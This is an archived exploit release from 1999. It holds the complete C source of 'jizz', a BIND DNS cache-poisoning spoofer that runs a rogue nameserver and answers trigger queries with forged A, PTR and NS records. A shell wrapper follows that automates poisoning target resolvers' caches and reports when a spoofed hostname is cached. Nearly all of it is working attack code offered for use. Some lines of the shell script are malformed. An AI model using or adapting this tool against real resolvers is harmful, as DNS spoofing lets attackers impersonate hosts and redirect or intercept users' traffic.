home *** CD-ROM | disk | FTP | other *** search
- #define VERSION ".01b"
- #include <stdio.h>
- #include <stdlib.h>
- #include <stdarg.h>
- #include <strings.h>
- #include <errno.h>
- #include <sys/socket.h>
- #include <sys/types.h>
- #include <netinet/in.h>
- #define MAXBUFSIZE 64*1024
- #define DC_A 1
- #define DC_NS 2
- #define DC_CNAME 5
- #define DC_SOA 6
- #define DC_WKS 11
- #define DC_PTR 12
- #define DC_HINFO 13
- #define DC_MINFO 14
- #define DC_MX 15
- #define DC_TXT 16
- typedef struct
- {
- unsigned short id;
- unsigned char rd:
- 1; /* recursion desired */
- unsigned char tc:
- 1; /* truncated message */
- unsigned char aa:
- 1; /* authoritive answer */
- unsigned char opcode:
- 4; /* purpose of message */
- unsigned char qr:
- 1; /* response flag */
- unsigned char rcode:
- 4; /* response code */
- unsigned char unused:
- 2; /* unused bits */
- unsigned char pr:
- 1; /* primary server required (non standard) */
- unsigned char ra:
- 1; /* recursion available */
- unsigned short qdcount;
- unsigned short ancount;
- unsigned short nscount;
- unsigned short arcount;
- }
- dnsheaderrec;
- typedef struct
- {
- unsigned short labellen;
- char label[256];
- unsigned short type;
- unsigned short class;
- unsigned long ttl;
- unsigned short buflen;
- char buf[256];
- }
- dnsrrrec;
- typedef struct
- {
- dnsheaderrec h;
- dnsrrrec qd[20];
- dnsrrrec an[20];
- dnsrrrec ns[20];
- dnsrrrec ar[20];
- }
- dnsrec;
- char *dnssprintflabel(char *s, char *buf, char *p);
- char *dnsaddlabel(char *p, char *label);
- void dnstxt2rr(dnsrrrec *rr, char *b);
- void dnsbuildpacket(dnsrec *dns, short qdcount, short ancount, short nscount, short arcount, ...);
- char *dnsaddbuf(char *p, void *buf, short len);
- int dnsmakerawpacket(dnsrec *dns, char *buf);
- unsigned long rev_long(l) unsigned long l;
- {
- unsigned long i = 0;
- int n = sizeof(i);
- while (n--)
- {
- i = (i << 8) | (l & 255);
- l >>= 8;
- }
- return i;
- }
- char *dnssprintflabel(char *s, char *buf, char *p)
- {
- unsigned short i,len;
- char *b=NULL;
- len=(unsigned short)*(p++);
- while (len)
- {
- while (len >= 0xC0)
- {
- if (!b)
- b=p+1;
- p=buf+(ntohs(*((unsigned short *)(p-1))) & ~0xC000);
- len=(unsigned short)*(p++);
- }
- for (i=0;i<len;i++)
- *(s++)=*(p++);
- *(s++)='.';
- len=(unsigned short)*(p++);
- }
- *(s++)=0;
- if (b)
- return(b);
- return(p);
- }
- char *dnsaddlabel(char *p, char *label)
- {
- char *p1;
- while ((*label) && (label))
- {
- if ((*label == '.') && (!*(label+1)))
- break;
- p1=strchr(label,'.');
- if (!p1)
- p1=strchr(label,0);
- *(p++)=p1-label;
- memcpy(p,label,p1-label);
- p+=p1-label;
- label=p1;
- if (*p1)
- label++;
- }
- *(p++)=0;
- return(p);
- }
- #define DEFAULTTTL 60*10
- void dnstxt2rr(dnsrrrec *rr, char *b)
- {
- char *tok[20], *p;
- unsigned short numt=0, i;
- static char *buf=NULL;
- if (!buf)
- {
- if ((buf=malloc(1024)) == NULL)
- {
- perror("malloc");
- exit(-1);
- }
- }
- strcpy(buf,b);
- p=strtok(buf," \t");
- do
- {
- tok[numt++]=p;
- }
- while (p=strtok(NULL," \t"));
- p=dnsaddlabel(rr->label,tok[0]);
- rr->labellen=p-rr->label;
- i=1;
- if (isdigit(*p))
- rr->ttl=htonl(atol(tok[i++]));
- else
- rr->ttl=htonl(DEFAULTTTL);
- if (strcmp(tok[i],"IN") == 0)
- i++;
- rr->class=htons(1);
- if (strcmp(tok[i],"A") == 0)
- {
- i++;
- rr->type=htons(DC_A);
- if (i < numt)
- {
- inet_aton(tok[i],rr->buf);
- rr->buflen=4;
- }
- else
- rr->buflen=0;
- return;
- }
- if (strcmp(tok[i],"CNAME") == 0)
- {
- i++;
- rr->type=htons(DC_CNAME);
- if (i < numt)
- {
- p=dnsaddlabel(rr->buf,tok[i]);
- rr->buflen=p-rr->buf;
- }
- else
- rr->buflen=0;
- return;
- }
- if (strcmp(tok[i],"NS") == 0)
- {
- i++;
- rr->type=htons(DC_NS);
- if (i < numt)
- {
- p=dnsaddlabel(rr->buf,tok[i]);
- rr->buflen=p-rr->buf;
- }
- else
- rr->buflen=0;
- return;
- }
- if (strcmp(tok[i],"PTR") == 0)
- {
- i++;
- rr->type=htons(DC_PTR);
- if (i < numt)
- {
- p=dnsaddlabel(rr->buf,tok[i]);
- rr->buflen=p-rr->buf;
- }
- else
- rr->buflen=0;
- return;
- }
- if (strcmp(tok[i],"MX") == 0)
- {
- i++;
- rr->type=htons(DC_MX);
- if (i < numt)
- {
- p=rr->buf;
- *((unsigned short *)p)=htons(atoi(tok[i++]));
- p+=2;
- p=dnsaddlabel(p,tok[i]);
- rr->buflen=p-rr->buf;
- }
- else
- rr->buflen=0;
- return;
- }
- }
- void dnsbuildpacket(dnsrec *dns, short qdcount, short ancount, short nscount, short arcount, ...)
- {
- int i;
- va_list va;
- dns->h.qdcount=htons(qdcount);
- dns->h.ancount=htons(ancount);
- dns->h.nscount=htons(nscount);
- dns->h.arcount=htons(arcount);
- dns->h.rcode=0;
- va_start(va, arcount);
- for (i=0;i<qdcount;i++)
- dnstxt2rr(&dns->qd[i],va_arg(va, char *));
- for (i=0;i<ancount;i++)
- dnstxt2rr(&dns->an[i],va_arg(va, char *));
- for (i=0;i<nscount;i++)
- dnstxt2rr(&dns->ns[i],va_arg(va, char *));
- for (i=0;i<arcount;i++)
- dnstxt2rr(&dns->ar[i],va_arg(va, char *));
- va_end(va);
- }
- char *dnsaddbuf(char *p, void *buf, short len)
- {
- memcpy(p,buf,len);
- return(p+len);
- }
- int dnsmakerawpacket(dnsrec *dns, char *buf)
- {
- char *p;
- int i;
- unsigned short len;
- memcpy(buf,&dns->h,sizeof(dnsheaderrec));
- p=buf+sizeof(dnsheaderrec);
- /********** Query ***********/
- for (i=0;i<ntohs(dns->h.qdcount);i++)
- {
- p=dnsaddbuf(p,dns->qd[i].label,dns->qd[i].labellen);
- p=dnsaddbuf(p,&dns->qd[i].type,2);
- p=dnsaddbuf(p,&dns->qd[i].class,2);
- }
- /********** Answer ***********/
- for (i=0;i<ntohs(dns->h.ancount);i++)
- {
- p=dnsaddbuf(p,dns->an[i].label,dns->an[i].labellen);
- p=dnsaddbuf(p,&dns->an[i].type,2);
- p=dnsaddbuf(p,&dns->an[i].class,2);
- p=dnsaddbuf(p,&dns->an[i].ttl,4);
- len=htons(dns->an[i].buflen);
- p=dnsaddbuf(p,&len,2);
- p=dnsaddbuf(p,dns->an[i].buf,dns->an[i].buflen);
- }
- /********** Nameservers ************/
- for (i=0;i<ntohs(dns->h.nscount);i++)
- {
- p=dnsaddbuf(p,dns->ns[i].label,dns->ns[i].labellen);
- p=dnsaddbuf(p,&dns->ns[i].type,2);
- p=dnsaddbuf(p,&dns->ns[i].class,2);
- p=dnsaddbuf(p,&dns->ns[i].ttl,4);
- len=htons(dns->ns[i].buflen);
- p=dnsaddbuf(p,&len,2);
- p=dnsaddbuf(p,dns->ns[i].buf,dns->ns[i].buflen);
- }
- /********** Additional ************/
- for (i=0;i<ntohs(dns->h.arcount);i++)
- {
- p=dnsaddbuf(p,dns->ar[i].label,dns->ar[i].labellen);
- p=dnsaddbuf(p,&dns->ar[i].type,2);
- p=dnsaddbuf(p,&dns->ar[i].class,2);
- p=dnsaddbuf(p,&dns->ar[i].ttl,4);
- len=htons(dns->ar[i].buflen);
- p=dnsaddbuf(p,&len,2);
- p=dnsaddbuf(p,dns->ar[i].buf,dns->ar[i].buflen);
- }
- return(p-buf);
- }
- void main(int argc, char *argv[])
- {
- int sock, fromlen, numread, len, query;
- struct sockaddr_in sa, from, to;
- struct in_addr rev;
- char *buf, *sendbuf;
- char *domainnamebuf;
- dnsheaderrec *dns;
- char *p;
- dnsrec dnsh;
- char *beginhost_QD, *beginhost_A, *beginhost_srch;
- char *fakenshost_A, *fakens_DOM;
- char *spoofedip_A, *spoofedip_PTR, *spoofedip_rev;
- printf("jizz %s -- dns spoofer (BIND cache vuln.)\n",VERSION);
- printf("by nimrood\n\n");
- if (argc != 7)
- {
- printf("usage: \n%s <beginhost> <fakenshost> <fakensip> <fakensdom> <spoofedip> <spoofedhost>\n",argv[0]);
- printf(" beginhost : requested to initiate false caching, ex: begin.ib6ub9.com\n");
- printf(" fakenshost : server name to answer false PTR's, ex: ns.ib6ub9.com\n");
- printf(" fakensip : IP of server name to answer false PTR's, ex:\n");
- printf(" fakensdom : domain name false name server controls, ex: ib6ub9.com\n");
- printf(" spoofedip : IP of machine you want to spoof from, ex:\n");
- printf(" spoofedhost: name you want to spoof, ex: teak.0wns.j00\n\n");
- exit(-1);
- }
- if ((beginhost_QD = malloc((strlen(argv[1]))+5+1)) == NULL)
- {
- perror("malloc");
- exit(-1);
- }
- if ((beginhost_A = malloc(strlen(argv[1])+15+1)) == NULL)
- {
- perror("malloc");
- exit(-1);
- }
- if ((beginhost_srch = malloc(strlen(argv[1])+1+1)) == NULL)
- {
- perror("malloc");
- exit(-1);
- }
- if ((fakenshost_A = malloc(strlen(argv[2])+strlen(argv[3])+6+1)) == NULL)
- {
- perror("malloc");
- exit(-1);
- }
- if ((fakens_DOM = malloc(strlen(argv[4])+strlen(argv[2])+4+1)) == NULL)
- {
- perror("malloc");
- exit(-1);
- }
- if ((spoofedip_A = malloc(strlen(argv[6])+strlen(argv[5])+6+1)) == NULL)
- {
- perror("malloc");
- exit(-1);
- }
- if ((spoofedip_PTR = malloc(strlen(argv[5])+strlen(argv[6])+21+1)) == NULL)
- {
- perror("malloc");
- exit(-1);
- }
- if ((spoofedip_rev = malloc(strlen(argv[5])+1)) == NULL)
- {
- perror("malloc");
- exit(-1);
- }
- if ((buf = malloc(MAXBUFSIZE)) == NULL)
- {
- perror("malloc");
- exit(-1);
- }
- if ((sendbuf = malloc(MAXBUFSIZE)) == NULL)
- {
- perror("malloc");
- exit(-1);
- }
- if ((domainnamebuf = malloc(MAXBUFSIZE)) == NULL)
- {
- perror("malloc");
- exit(-1);
- }
- if ((sock=socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) < 0)
- {
- perror("socket");
- exit(-1);
- }
- beginhost_QD = strcpy(beginhost_QD,argv[1]);
- beginhost_QD = strcat(beginhost_QD, " IN A");
- beginhost_A = strcat(strcpy(beginhost_A,beginhost_QD), "");
- beginhost_srch = strcat(strcpy(beginhost_srch,argv[1]), ".");
- printf("%s\n",beginhost_srch);
- fakenshost_A = strcat(strcpy(fakenshost_A,argv[2]), " IN A ");
- fakenshost_A = strcat(fakenshost_A, argv[3]);
- fakens_DOM = strcat(strcpy(fakens_DOM,argv[4]), " IN NS ");
- fakens_DOM = strcat(fakens_DOM,argv[2]);
- spoofedip_A = strcat(strcpy(spoofedip_A,argv[6]), " IN A ");
- spoofedip_A = strcat(spoofedip_A,argv[5]);
- rev.s_addr = rev_long(inet_addr(argv[5]));
- spoofedip_PTR = strcat(strcpy(spoofedip_PTR,(char *)inet_ntoa(rev.s_addr)), ".IN-ADDR.ARPA IN PTR ");
- spoofedip_PTR = strcat(spoofedip_PTR,argv[6]);
- printf("%s\n%s\n%s\n%s\n%s\n%s\n",
- beginhost_QD,beginhost_A,fakenshost_A,fakens_DOM,spoofedip_A,spoofedip_PTR);
- sa.sin_family = AF_INET;
- /* sa.sin_addr.s_addr = inet_addr(DEFAULTBINDHOST); */
- sa.sin_addr.s_addr = INADDR_ANY;
- sa.sin_port = htons(53);
- if (bind(sock, (struct sockaddr *)&sa, sizeof(sa)) < 0)
- {
- perror("bind");
- exit(-1);
- }
- setvbuf(stdout,NULL,_IONBF,0);
- while (1)
- {
- fromlen=sizeof(from);
- if ((numread = recvfrom(sock, buf, MAXBUFSIZE, 0, (struct sockaddr *)&from, &fromlen)) < 0)
- {
- perror("recvfrom");
- continue;
- }
- /* Kludge to stop that damn router */
- if (from.sin_addr.s_addr == inet_addr(""))
- continue;
- dns=(dnsheaderrec *)buf;
- if (dns->qr)
- continue;
- p=dnssprintflabel(domainnamebuf,buf,&buf[sizeof(dnsheaderrec)]);
- query=ntohs(*(unsigned short *)p);
- printf("Packet from %s : %d : %s (%d)\n",inet_ntoa(from.sin_addr),ntohs(from.sin_port),domainnamebuf,query);
- if (strcasecmp(domainnamebuf,beginhost_srch) == 0)
- {
- dnsbuildpacket(&dnsh,1,4,1,1,
- beginhost_QD,
- beginhost_A,
- spoofedip_A,
- spoofedip_PTR,
- fakenshost_A,
- fakens_DOM,
- "www.yahoo.com IN A");
- }
- else
- {
- /* Error */
- dnsh.h.rcode=5;
- strcat(domainnamebuf," IN A");
- dnsbuildpacket(&dnsh,1,0,0,0,
- domainnamebuf);
- }
- dnsh.qd[0].type=htons(query);
- dnsh.h.id=((dnsheaderrec *)buf)->id;
- dnsh.h.qr=1;
- dnsh.h.aa=1;
- len=dnsmakerawpacket(&dnsh,sendbuf);
- to.sin_family=AF_INET;
- to.sin_addr.s_addr=from.sin_addr.s_addr;
- to.sin_port=from.sin_port;
- if (sendto(sock,sendbuf,len,0,(struct sockaddr *)&to,sizeof(to)) < 0)
- {
- perror("sendto");
- continue;
- }
- }
- }
- /* www.hack.co.za [1999]*/
- --- begin jizz.sh ---
- #!/bin/sh
- #
- # This script requires perl and the latest version of sh-utils for calculations,
- # as well as other various standard unix utilities.
- #
- # This interface DOES NOT require you to know the cacheing nameserver of
- # the destination server, it will attempt to calculate it for you.
- #
- case "${3}" in
- "")
- echo
- echo "Intelligent DNS spoofer interface, by philbert."
- echo "(philbert@DataTrax.Net)"
- echo
- echo "usage: $0 <your ip> <spoofed domain> <irc/misc server>"
- echo "or: $0 <your ip> <spoofed domain> -ns <NS to cache fake domain>"
- echo
- exit 1
- ;;
- esac
- # ----------------------------------------------------------
- # Set the configurations for your nameserver here
- # The name of the nameserver this is running on:
- NS=ns3.datatrax.net
- # The IP address of the nameserver this is running on:
- IP=
- # A domain that this nameserver is strictly authorative for:
- AUTH=spoof.datatrax.net
- # End of user configuration
- # ----------------------------------------------------------
- export RAND
- jizz $RAND.$AUTH. $NS $IP $AUTH $1 $2. >/dev/null &
- sleep 1
- if [ "$3" = "-ns" ]; then
- echo "echo "trying to cache $2 on $4..."
- nslookup -type=soa $RAND.$AUTH. $4 >/dev/null 2>&1
- echo "$1 is cached on $2 as `nslookup $1 $2 | grep Name | cut -c10-`
- exit 1
- else false ; fi
- NS=`host $3. | perl -n -e 's/([0-9]+\.[0-9]+\.[0-9]+\.[0-9]+)/print $1/e'`
- if [ "NS" = "" ]; then NS=$3; else NS=$NS; fi
- echo "trying to cache $2 on the server itself..."
- nslookup -type=soa $RAND.$AUTH. $NS >/dev/null 2>&1
- TEST=`nslookup $1 $3 | grep Name | cut -c10-`
- if [ "$TEST" = "$2" ]; then
- echo "Success!, $2 is cached on $3 as $1"
- else echo "Failed..."; fi
- RDEST=`nslookup $NS | grep Name | cut -c10-`
- if [ "$RDEST" = "" ]; then RDEST=$3; else RDEST=$RDEST; fi
- NS=`dnsquery $RDEST | grep "IN NS" | cut -f3- | cut -f2- -dS`
- if [ "$NS" = "" ]; then
- NS=`echo $RDEST | cut -f2- -d.`
- NS=`dnsquery $NS | grep "IN NS" | cut -f3- | cut -f2- -dS`
- else NS=$NS; fi
- while true ; do
- TARGET=`echo $NS | cut -f$CRUNCH -d" "`
- if [ "$TARGET" = "" ]; then
- killall -9 jizz >/dev/null &
- exit 1; else TARGET=$TARGET; fi
- echo "trying to cache $2 on $TARGET..."
- nslookup -type=soa $RAND.$AUTH. $TARGET >/dev/null 2>&1
- TEST=`nslookup $1 $TARGET | grep Name | cut -c10-`
- if [ "$TEST" = "$2" ]; then
- echo "Success!, $2 is cached on $TARGET as $1"
- else echo "Failed..."; fi
- CRUNCH=`expr $CRUNCH + 1`
- done
- --- end jizz.sh ---